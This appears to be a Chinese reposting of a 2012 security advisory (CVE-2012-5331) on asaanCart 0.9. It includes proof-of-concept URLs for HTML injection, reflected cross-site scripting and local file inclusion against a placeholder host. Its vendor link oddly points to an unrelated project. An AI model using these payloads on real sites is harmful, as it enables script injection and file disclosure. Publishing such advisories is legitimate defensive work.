Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / asaanCart多个输入验证漏洞

发布日期:2012-03-14
更新日期:2012-10-10受影响系统:
sourceforge asaanCart 0.9
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52498
CVE ID: CVE-2012-5331asaanCart是专为小型业务开发的在线购物车解决方案。asaanCart 0.9存在目录穿越漏洞,通过index.php内的page参数“..”,可允许远程攻击者包含任意本地文件。<*来源:Number 7
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!for the HTML-injection vulnerabilities:
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/calc.php/%22onmouseover=prompt(944322)%3E%3Cu%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3EInjection%20Here%3C/big%3E%3C/big%3E%3C/big%3E%3C/big%3E%3C/u%3E
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/chat.php/%22onmouseover=prompt(998415)%3E%3CBig%3E%3Cbig%3E%3Cbig%3E%3Cbig%3E%3Cu%3EHtml%20Injection%20HerE.%3C/u%3E%3C/Big%3E%3C/big%3E%3C/big%3E%3C/big%3E
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/register.php/%22onmouseover=prompt(970389)%3E%3Cbig%20style=%22color:%20rgb(204,%200,%200);%22%3E%3Cbig%3E%3Cspanstyle=%22font-weight:%20bold;%20font-style:%20italic;%20text-decoration:%20underline;%22%3EHtmlInjection.%3C/span%3E%3C/big%3E%3C/big%3E
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/index.php/%22onmouseover=prompt(970389)%3E%3Cbig%20style=%22color:%20rgb(204,%200,%200);%22%3E%3Cbig%3E%3Cspanstyle=%22font-weight:%20bold;%20font-style:%20italic;%20text-decoration:%20underline;%22%3EHtmlInjection.%3C/span%3E%3C/big%3E%3C/big%3Efor the cross-site scripting vulnerability:
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/index.php?_=&amp;f=update_intro&amp;page=1%3CScRiPt%20%3Eprompt%28949136%29%3C%2fScRiPt%3Efor the local file-include vulnerability:
http://www.example.com/asaancart%20v-0.9/libs/smarty_ajax/index.php?_=&amp;f=update_intro&amp;page=../../../../../templatesadd_product建议:
--------------------------------------------------------------------------------
厂商补丁:sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://jocr.sourceforge.net/index.htmlTiny Server远程目录遍历漏洞asaanCart跨站脚本执行漏洞相关资讯      输入验证漏洞  asaanCart  asaanCart漏洞 
  • asaanCart跨站脚本执行漏洞  (10/10/2012 08:04:23)
  • IBM WebSphere Sensor Events多个  (06/13/2012 06:45:54)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
    • 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图